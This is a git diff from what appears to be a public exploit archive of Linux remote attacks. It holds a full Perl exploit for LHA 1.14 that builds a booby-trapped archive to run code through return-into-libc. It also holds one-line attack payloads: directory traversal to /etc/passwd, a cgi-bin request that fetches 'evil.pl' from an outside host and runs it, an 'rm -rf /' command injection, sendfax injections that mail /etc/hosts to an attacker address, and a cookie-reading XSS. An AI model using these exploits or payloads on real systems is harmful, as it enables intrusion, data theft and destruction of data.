"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff". - "\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xff\x2d\x6c\x68\x64\x2d\x48". - "\x1\x0\x0\x0\x0\x0\x0\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50". - "\xed\x41\x7\x0\x51\x0\x0\x0\x0\x35\x1\x2\x46\xff\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x7\x0\x54\xaf\x68". - "\xaa\x40\x0\x0\x19\x10\x2d\x6c\x68\x64\x2d\x59\x1\x0\x0\x0\x0\x0\x0". - "\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0". - "\x0\x0\x0\x46\x1\x2\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\xff\x41\x41\x41\x41". - $system_addr. $exit_addr. $tmp_string. - "\xff\x7\x0\x54\xaf\x68\xaa\x40\x0\x0\x0"; - ----CODE END--- \ No newline at end of file diff --git a/platforms/linux/remote/24120.pl b/platforms/linux/remote/24120.pl new file mode 100755 index 000000000..8cca8f6b3 --- /dev/null +++ b/platforms/linux/remote/24120.pl @@ -0,0 +1,128 @@ +//source: http://www.securityfocus.com/bid/10354/info +// +//LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. These issues are triggered in the 'extract_one()' and are due to a failure of the application to properly validate string lengths in offending files. +// +//These issues might allow an attacker to execute code in the context of a user invoking the affected utility. +// +//Exploiting lha-1.14 (after security advisories) +//19 May, 2004 +//Copyright (2004) Lukasz Wojtow <lw@wszia.edu.pl> +// +//At the time of writing this text, some vulnerabilities have been discovered +//and fixed, but not all (i've sent info to major linux distributions and +//Bugtraq, but they didn't seem to bother). +//This code creates an archive, which decompressed with lha-1.14 +//will cause a buffer overflow. The bug is in function extract_one (there are a +//lot of bugs, actually). At first it looked like like a typical stack overflow, +//but after a couple of thoughts it was obvious that returnig on the stack was +//impossible (due to special 0xff handling). The only option came to my mind +//was return-into-libc. +//Addresses inside this code do system("/tmp/lhXXXXXX") and exit(). +//Before exploiting 3 addresses have to be obtained: +//- system function, +//- exit function (not really needed, but SEGFAULT could be noticed), +//- address of /tmp/lhXXXXXX inside exploitet binary. +//Put these addresses into their place in the code (in little endian order +//on x86) and run: +//./code > archive.lhz +// +//then command +//lha -e archive.lhz +//will cause execution of /tmp/lhXXXXXX +//Enjoy +// +//---CODE START--- + +#!/usr/bin/perl +my $exit_addr= "\x50\xf2\x4\x40"; +my $system_addr= "\x30\x65\x6\x40"; +my $tmp_string= "\xfa\x1e\x5\x8"; + +print "\x19\x8d\x2d\x6c\x68\x64\x2d\x18\x0\x0\x0\x0\x0\x0\x0\xe1\xa5". + "\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0". + "\x0\x0\x5\x0\x2\x46\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xde". + "\x2d\x6c\x68\x64\x2d\x69\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20". + "\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\x56\x0\x2". + "\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x2f\x2d\x6c\x68". + "\x64\x2d\xba\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0". + "\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xa7\x0\x2\x46\xff\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x81\x2d\x6c\x68\x64\x2d". + "\xb\x1\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0". + "\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xf8\x0\x2\x46\xff\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff". + "\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xff\x2d\x6c\x68\x64\x2d\x48". + "\x1\x0\x0\x0\x0\x0\x0\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50". + "\xed\x41\x7\x0\x51\x0\x0\x0\x0\x35\x1\x2\x46\xff\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x7\x0\x54\xaf\x68". + "\xaa\x40\x0\x0\x19\x10\x2d\x6c\x68\x64\x2d\x59\x1\x0\x0\x0\x0\x0\x0". + "\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0". + "\x0\x0\x0\x46\x1\x2\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\xff\x41\x41\x41\x41". + $system_addr. $exit_addr. $tmp_string. + "\xff\x7\x0\x54\xaf\x68\xaa\x40\x0\x0\x0"; + +//---CODE END--- \ No newline at end of file diff --git a/platforms/linux/remote/24136.txt b/platforms/linux/remote/24136.txt old mode 100755 new mode 100644 index 38e329032..b4054b5f4 --- a/platforms/linux/remote/24136.txt +++ b/platforms/linux/remote/24136.txt @@ -12,4 +12,4 @@ alt="http://www.example.com"></A> <map NAME="malware" alt="http://www.example.com"> <area SHAPE=RECT COORDS="224,21" HREF="http://www.malware.com" alt="http://www.example.com"> -</MAP> \ No newline at end of file +</MAP> \ No newline at end of file diff --git a/platforms/linux/remote/24160.txt b/platforms/linux/remote/24160.txt old mode 100755 new mode 100644 index 3f4121661..fd575195c --- a/platforms/linux/remote/24160.txt +++ b/platforms/linux/remote/24160.txt @@ -4,4 +4,4 @@ SquirrelMail is reported to be prone to an email header HTML injection vulnerabi An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials; disclosure of personal email is possible. Other attacks are also possible. -Content-Type: application/octet-stream"<script>window.alert(document.cookie)</script>"; name=top_secret.pdf \ No newline at end of file +Content-Type: application/octet-stream"<script>window.alert(document.cookie)</script>"; name=top_secret.pdf \ No newline at end of file diff --git a/platforms/linux/remote/24179.txt b/platforms/linux/remote/24179.txt old mode 100755 new mode 100644 index 8d6e4bde9..000e34fed --- a/platforms/linux/remote/24179.txt +++ b/platforms/linux/remote/24179.txt @@ -4,4 +4,4 @@ Roundup is prone to a remote file disclosure vulnerability. A remote user can di This vulnerability affects Roundup 0.6.11 and prior versions. -GET /cit/@@file/../../../../etc/passwd HTTP/1.0 \ No newline at end of file +GET /cit/@@file/../../../../etc/passwd HTTP/1.0 \ No newline at end of file diff --git a/platforms/linux/remote/24205.txt b/platforms/linux/remote/24205.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24259.c b/platforms/linux/remote/24259.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24312.html b/platforms/linux/remote/24312.html old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24338.c b/platforms/linux/remote/24338.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24339.c b/platforms/linux/remote/24339.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24361.c b/platforms/linux/remote/24361.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24622.c b/platforms/linux/remote/24622.c old mode 100755 new mode 100644 index 510bc7186..b11424e4a --- a/platforms/linux/remote/24622.c +++ b/platforms/linux/remote/24622.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/11233/info It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed sized memory buffer. Version 1.9.15 of LaTeX2rtf is reported vulnerable to this issue. Other versions may also be affected. +*/ char center[] = { 0x59 /* cx = *sp++ */ diff --git a/platforms/linux/remote/24669.txt b/platforms/linux/remote/24669.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24704.c b/platforms/linux/remote/24704.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24784.txt b/platforms/linux/remote/24784.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24795.txt b/platforms/linux/remote/24795.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24801.txt b/platforms/linux/remote/24801.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24848.txt b/platforms/linux/remote/24848.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24852.txt b/platforms/linux/remote/24852.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24853.c b/platforms/linux/remote/24853.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24856.c b/platforms/linux/remote/24856.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24857.c b/platforms/linux/remote/24857.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24947.txt b/platforms/linux/remote/24947.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24977.txt b/platforms/linux/remote/24977.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24978.txt b/platforms/linux/remote/24978.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25.c b/platforms/linux/remote/25.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25005.txt b/platforms/linux/remote/25005.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25006.txt b/platforms/linux/remote/25006.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25008.txt b/platforms/linux/remote/25008.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25010.txt b/platforms/linux/remote/25010.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25015.txt b/platforms/linux/remote/25015.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25030.txt b/platforms/linux/remote/25030.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25035.txt b/platforms/linux/remote/25035.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25036.txt b/platforms/linux/remote/25036.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25054.txt b/platforms/linux/remote/25054.txt old mode 100755 new mode 100644 index d588258a1..98c164d54 --- a/platforms/linux/remote/25054.txt +++ b/platforms/linux/remote/25054.txt @@ -10,4 +10,4 @@ An attacker may leverage these issues to execute arbitrary shell and Konversatio When an unsuspecting user joins a channel named #%n/quit%n and the Part Button their client will quit. -When an unsuspecting user enters a channel named #`kwrite` and executes the /uptime command, the kwrite application will be activated. \ No newline at end of file +When an unsuspecting user enters a channel named #`kwrite` and executes the /uptime command, the kwrite application will be activated. \ No newline at end of file diff --git a/platforms/linux/remote/25122.txt b/platforms/linux/remote/25122.txt old mode 100755 new mode 100644 index 0fd358347..bc96c8fe2 --- a/platforms/linux/remote/25122.txt +++ b/platforms/linux/remote/25122.txt @@ -22,4 +22,4 @@ To determine the existence of files in a ZIP archive: site nfo ../../*.zip To disclose the contents of files with names starting with the letter 'p' in a directory: -site nfo ../../backup.zip p* \ No newline at end of file +site nfo ../../backup.zip p* \ No newline at end of file diff --git a/platforms/linux/remote/25150.txt b/platforms/linux/remote/25150.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25221.txt b/platforms/linux/remote/25221.txt old mode 100755 new mode 100644 index 215e37061..4ce183262 --- a/platforms/linux/remote/25221.txt +++ b/platforms/linux/remote/25221.txt @@ -16,4 +16,4 @@ This issue may be leveraged by an attacker to display false information in the s </td></tr></table> </a><!-- second --> -</div> \ No newline at end of file +</div> \ No newline at end of file diff --git a/platforms/linux/remote/25275.c b/platforms/linux/remote/25275.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25297.txt b/platforms/linux/remote/25297.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25321.c b/platforms/linux/remote/25321.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25392.c b/platforms/linux/remote/25392.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25526.c b/platforms/linux/remote/25526.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25669.txt b/platforms/linux/remote/25669.txt old mode 100755 new mode 100644 index 5a9393cc9..ee894b730 --- a/platforms/linux/remote/25669.txt +++ b/platforms/linux/remote/25669.txt @@ -8,4 +8,4 @@ The following url downloads a script (or executable) to the server: http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl This is how the script can be executed afterwards: -http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl \ No newline at end of file +http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl \ No newline at end of file diff --git a/platforms/linux/remote/25706.cpp b/platforms/linux/remote/25706.cpp old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/25802.txt b/platforms/linux/remote/25802.txt old mode 100755 new mode 100644 index 842c19353..f2aca637a --- a/platforms/linux/remote/25802.txt +++ b/platforms/linux/remote/25802.txt @@ -6,4 +6,4 @@ An attacker can supply arbitrary commands prefixed with the '|' character as a v An attacker can exploit this issue in various ways including providing a malformed user name through FTP. -sshd rhost 9 10 11 |rm${IFS}-rf${IFS}/|echo'1.1.1.1' \ No newline at end of file +sshd rhost 9 10 11 |rm${IFS}-rf${IFS}/|echo'1.1.1.1' \ No newline at end of file diff --git a/platforms/linux/remote/25820.txt b/platforms/linux/remote/25820.txt old mode 100755 new mode 100644 index a85fbd02a..0a5af2dd6 --- a/platforms/linux/remote/25820.txt +++ b/platforms/linux/remote/25820.txt @@ -6,4 +6,4 @@ It has been reported that an attacker may bypass SurfinGate file filtering rules SurfinGate version 7.0 SP2 and 7.0 SP3 are reportedly vulnerable. Other versions may be affected as well. -http://www.example.com/ourpics/sware/Mustangworld%2escr \ No newline at end of file +http://www.example.com/ourpics/sware/Mustangworld%2escr \ No newline at end of file diff --git a/platforms/linux/remote/26024.txt b/platforms/linux/remote/26024.txt old mode 100755 new mode 100644 index 6ac28d038..adc1b3a89 --- a/platforms/linux/remote/26024.txt +++ b/platforms/linux/remote/26024.txt @@ -4,4 +4,4 @@ Internet Graphics Server is affected by a directory traversal vulnerability. Thi A remote unauthorized user can disclose the contents of arbitrary local files through the use of directory traversal strings '../'. Exploitation of this vulnerability could lead to a loss of confidentiality. -http://host/htdocs/../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://host/htdocs/../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/linux/remote/26101.txt b/platforms/linux/remote/26101.txt old mode 100755 new mode 100644 index 6a7a784db..b7d32e00a --- a/platforms/linux/remote/26101.txt +++ b/platforms/linux/remote/26101.txt @@ -5,4 +5,4 @@ EMC Navisphere Manager is affected by directory traversal and information disclo A remote unauthorized user can disclose the contents of arbitrary local files through the use of directory traversal strings '../'. An attacker can also obtain the contents of arbitrary directories by appending a '.' to the end of a request. Exploitation of these vulnerabilities could lead to a loss of confidentiality and information disclosure. http://www.example.com/../../../../../../../EMC/NAVISPHERE/common/log/navimon.log -http://www.example.com/. \ No newline at end of file +http://www.example.com/. \ No newline at end of file diff --git a/platforms/linux/remote/26198.txt b/platforms/linux/remote/26198.txt old mode 100755 new mode 100644 index 7c42f85fb..1337b6863 --- a/platforms/linux/remote/26198.txt +++ b/platforms/linux/remote/26198.txt @@ -8,4 +8,4 @@ Astaro Security Linux 6.001 is prone to this weakness. Connect to TCP port 8080 and enter the following command: -CONNECT localhost:80 HTTP/1.0 \ No newline at end of file +CONNECT localhost:80 HTTP/1.0 \ No newline at end of file diff --git a/platforms/linux/remote/26288.txt b/platforms/linux/remote/26288.txt old mode 100755 new mode 100644 index be1e35ef3..9e0920613 --- a/platforms/linux/remote/26288.txt +++ b/platforms/linux/remote/26288.txt @@ -8,4 +8,4 @@ Mozilla Firefox 1.0.6 running on UNIX-based platforms is reportedly vulnerable. Mozilla Browser 1.7.x versions and Thunderbird 1.x versions are also vulnerable to this issue. -http://local\`find\`host \ No newline at end of file +http://local\`find\`host \ No newline at end of file diff --git a/platforms/linux/remote/26536.txt b/platforms/linux/remote/26536.txt old mode 100755 new mode 100644 index 9914bb65d..a0b1e4459 --- a/platforms/linux/remote/26536.txt +++ b/platforms/linux/remote/26536.txt @@ -25,4 +25,4 @@ c:\> telnet 1.2.3.4 143 2 OK [READ-WRITE] opened ./../../administrator/inbox 2 fetch 1 (RFC822.TEXT) -* 1 FETCH (RFC822.TEXT {131} \ No newline at end of file +* 1 FETCH (RFC822.TEXT {131} \ No newline at end of file diff --git a/platforms/linux/remote/26540.txt b/platforms/linux/remote/26540.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/26913.c b/platforms/linux/remote/26913.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/27032.txt b/platforms/linux/remote/27032.txt old mode 100755 new mode 100644 index 4811293dd..704681139 --- a/platforms/linux/remote/27032.txt +++ b/platforms/linux/remote/27032.txt @@ -8,4 +8,4 @@ sendfax -d "411;number=\`cat /etc/hosts\`" /etc/hosts sendfax -f "\`cat /etc/hosts|mail -s hosts attacker@example.com\` <attacker@example.com>" -d 411 /etc/hosts -sendfax -d "@411\";cat /etc/hosts|mail -s hosts attacker@example.com;" /etc/hosts \ No newline at end of file +sendfax -d "@411\";cat /etc/hosts|mail -s hosts attacker@example.com;" /etc/hosts \ No newline at end of file diff --git a/platforms/linux/remote/27150.txt b/platforms/linux/remote/27150.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/27233.txt b/platforms/linux/remote/27233.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/27234.txt b/platforms/linux/remote/27234.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/27235.txt b/platforms/linux/remote/27235.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/27244.txt b/platforms/linux/remote/27244.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/27326.txt b/platforms/linux/remote/27326.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/27397.txt b/platforms/linux/remote/27397.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/27630.txt b/platforms/linux/remote/27630.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/277.c b/platforms/linux/remote/277.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/27801.txt b/platforms/linux/remote/27801.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/27802.txt b/platforms/linux/remote/27802.txt old mode 100755 new mode 100644 diff 